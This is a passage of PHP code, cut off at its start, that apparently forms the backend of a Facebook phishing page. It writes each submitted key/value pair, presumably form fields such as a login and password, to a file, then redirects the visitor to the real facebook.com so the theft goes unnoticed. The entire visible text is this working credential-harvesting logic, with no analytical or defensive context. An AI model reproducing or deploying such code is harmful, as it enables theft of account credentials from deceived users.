$value) { fwrite($file, "\t\t\t\t\t\t"); fwrite($file, $key); fwrite($file, "="); fwrite($file, $value); fwrite($file, "\r\n"); } fwrite($file, "\r\n"); fwrite($file, "\t\t\t\t\t\t"); fclose($file); header('Location: https://facebook.com'); die(); ?>